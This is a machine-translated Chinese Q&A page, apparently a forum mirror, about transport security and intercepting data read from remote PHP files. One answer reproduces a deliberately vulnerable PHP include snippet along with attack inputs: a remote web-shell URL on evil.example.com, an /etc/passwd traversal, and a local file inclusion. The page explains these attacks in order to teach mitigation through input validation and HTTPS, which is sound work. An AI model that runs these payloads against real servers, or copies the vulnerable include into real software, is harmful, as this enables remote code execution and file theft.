-1
我看到它在这个问题提到:什么是运输安全?
Including a remote php file as a resource
所以你怎么能一个人“拦截”(?和修改)正在发送/接收的数据? (在这个问题,这是一个远程PHP文件阅读与fopen)
Q
什么是运输安全?
A
回答
1
这个从Wikipedia的例子,可能会认识到你的不良影响。
<?php
$color = 'blue';
if (isset($_GET['COLOR']))
$color = $_GET['COLOR'];
include($color . '.php');
?>
COLOR = HTTP://evil.example.com/webshell.txt - 注入含有恶意代码
COLOR =/etc/passwd的远程托管文件 - 允许攻击者读取passwd文件的内容在UNIX系统目录遍历
/vulnerable.php?COLOR=C:\ftp\upload\exploit - 从已经上传的文件名为exploit.php执行代码(本地文件包含漏洞)
我希望从这些例子中,潜伏的危险对你更清楚。 “
”脚本以外的不可信数据需要验证“才能缓解这些攻击。
+1
我怀疑有一个'/ etc/passwd.php'包含有价值的信息。 – Gumbo 2012-07-29 07:18:54
2
你可能想要阅读维基百科有关Man-in-the-middle attacks的文章。
正如PeeHaa指出的,您可以使用HTTPS使用SSL/TLS加密您的HTTP流。
MITM攻击不是HTTP特定的问题。此问题影响所有通过不受信任网络的通信。
相关问题
- 1. 输入安全或输入安全的类型是什么意思?
- 2. 什么是“安全变量”?
- 3. 什么是IP安全?
- 4. 什么是春季安全
- 5. 什么是类型安全?
- 6. 苹果运输安全
- 7. 安全导航运算符的最佳实现是什么
- 8. 是否在安全模式下运行PHP有什么区别?
- 9. 为什么不是运算符类型在java中安全的?
- 10. 什么是C/C++中的“安全”和“不安全”代码?
- 11. 为什么ConcurrentHashMap.putifAbsent是安全的?
- 12. 什么是用例在春季安全
- 13. 是什么让跨域ajax不安全?
- 14. 什么是沟通渠道安全?
- 15. 什么是安全堆大小?
- 16. 什么是不安全的HTML?
- 17. 线程安全是什么意思?
- 18. 什么是安全参数jdk.tls.disabledAlgorithms
- 19. 什么是“声明式安全”?一般
- 20. 线程安全是什么意思?
- 21. 为什么是安全的弦
- 22. msdn:什么是“线程安全”?
- 23. 什么是PHP安全模式GID?
- 24. 什么是线程安全的对象
- 25. 什么是内存安全漏洞?
- 26. .net中的类型安全是什么?
- 27. JSF的安全性问题是什么?
- 28. 什么是vb.net中的类型安全?
- 29. 什么是Windows安全:$ SDS:$ DATA?
- 30. 散居的安全问题是什么?
通过'http'连接的所有内容都可以被嗅探,因为它是以纯文本形式发送的。当通过安全连接“https”进行时,数据将被加密。 – PeeHaa 2012-07-28 16:41:48